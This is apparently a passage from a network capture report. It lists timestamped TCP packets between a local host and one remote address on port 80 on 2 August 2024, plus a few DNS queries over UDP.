Aug 2, 2024 13:43:10.911663055 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911696911 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911708117 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911736012 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911771059 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911783934 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911806107 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911840916 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911860943 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.917035103 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.999715090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.999939919 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.999977112 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.999996901 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.000013113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.000047922 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.000067949 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.000082016 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.000116110 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.000127077 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.001318932 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001352072 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001370907 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.001385927 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001421928 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001425028 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.001456022 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001488924 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001540899 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001559019 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.001590967 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.001761913 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001795053 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001828909 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.001843929 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002100945 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002136946 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002149105 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002171993 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002204895 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002218008 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002240896 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002275944 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002290010 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002310038 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002341986 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002355099 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002376080 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002408981 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002425909 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002445936 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002491951 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.002943993 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.002996922 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003047943 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003050089 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003082991 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003117085 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003132105 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003150940 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003184080 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003210068 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003212929 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003252983 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003269911 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003289938 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003323078 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003340006 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003356934 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003388882 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003403902 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003427029 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003459930 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003475904 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003493071 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003525972 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003537893 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003560066 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003593922 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003606081 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003628016 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003660917 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003671885 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003695011 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003726959 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003736973 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.003762960 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.003810883 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.004709005 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004740953 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004791975 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004821062 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.004825115 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004858971 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004873037 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.004892111 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004924059 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004950047 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.004956007 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.004991055 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005002975 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005024910 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005059004 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005070925 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005091906 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005125046 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005140066 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005157948 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005192041 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005206108 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005224943 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005264997 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005273104 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005297899 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005331993 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005347967 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005364895 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005398035 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005418062 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005431890 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005465031 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005479097 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005498886 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005531073 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005539894 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.005563974 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.005603075 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.007637024 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.007671118 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.007703066 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.007715940 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.007738113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.007774115 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.007782936 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.010541916 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.127840996 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.127912045 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.127973080 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.127990007 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128025055 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128058910 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128073931 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128129005 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128163099 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128179073 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128199100 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128235102 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128252983 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128287077 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128320932 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128350019 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128355980 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128391027 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128403902 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128424883 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128457069 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128472090 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128509998 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128545046 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128578901 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128593922 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128612041 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128632069 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.128649950 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.128700972 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132323980 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132380962 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132431030 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132433891 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132466078 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132517099 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132524967 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132550955 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132601023 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132606983 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132637024 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132672071 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132685900 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132707119 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132740021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132775068 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132776976 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132807970 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132827997 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132847071 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132900953 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.132951021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.132983923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133017063 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133033037 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133050919 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133084059 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133099079 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133119106 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133153915 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133164883 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133187056 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133220911 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133233070 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133254051 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133290052 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133306980 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133323908 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133358955 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133368969 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133394957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133435965 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133445978 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133481026 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133513927 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133527994 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133548975 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133591890 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133599043 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133634090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133666992 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133677959 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133702040 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133733988 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133748055 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133768082 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133809090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133817911 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133842945 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133876085 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133887053 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133910894 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133944988 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.133955002 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.133980036 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134011984 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134026051 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134048939 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134083033 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134102106 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134116888 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134150028 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134166956 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134182930 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134216070 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134234905 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134249926 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134284019 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134306908 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134318113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134351969 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134372950 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134386063 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134418011 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134428978 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134453058 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134485960 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134501934 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134521008 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134553909 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134567976 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134588957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134624958 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134629965 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134663105 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134696007 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134710073 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134732962 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134764910 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134776115 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134799957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134834051 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134848118 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134867907 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134900093 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134907961 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.134934902 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134968996 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.134985924 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135003090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135035038 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135051966 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135071993 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135114908 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135428905 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135461092 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135497093 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135504007 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135529995 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135562897 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135571957 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135596037 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135629892 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135641098 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135662079 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135711908 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135725021 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135746002 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135778904 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135793924 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135813951 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135848045 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135859013 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135883093 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135916948 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135921955 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.135950089 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135983944 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.135993958 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.136020899 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.136054993 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.136070013 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.136090994 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.136141062 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.137645006 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.220031977 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.220087051 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.220182896 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.220523119 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:11.220580101 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.233453035 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:11.239697933 CEST	80	49761	103.42.108.46	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2024 13:41:13.752749920 CEST	55997	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:41:13.858853102 CEST	53	55997	1.1.1.1	192.168.2.4
Aug 2, 2024 13:41:34.798878908 CEST	57111	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:41:34.828028917 CEST	53	57111	1.1.1.1	192.168.2.4
Aug 2, 2024 13:41:48.309276104 CEST	49466	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:41:48.321151972 CEST	53	49466	1.1.1.1	192.168.2.4
Aug 2, 2024 13:41:56.415199995 CEST	64217	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:41:56.685769081 CEST	53	64217	1.1.1.1	192.168.2.4
Aug 2, 2024 13:42:10.134658098 CEST	51084	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:42:10.157426119 CEST	53	51084	1.1.1.1	192.168.2.4
Aug 2, 2024 13:42:18.333436966 CEST	63593	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:42:18.750174046 CEST	53	63593	1.1.1.1	192.168.2.4
Aug 2, 2024 13:42:32.482949972 CEST	55787	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:42:32.691189051 CEST	53	55787	1.1.1.1	192.168.2.4
Aug 2, 2024 13:42:46.124473095 CEST	52975	53	192.168.2.4	1.1.1.1
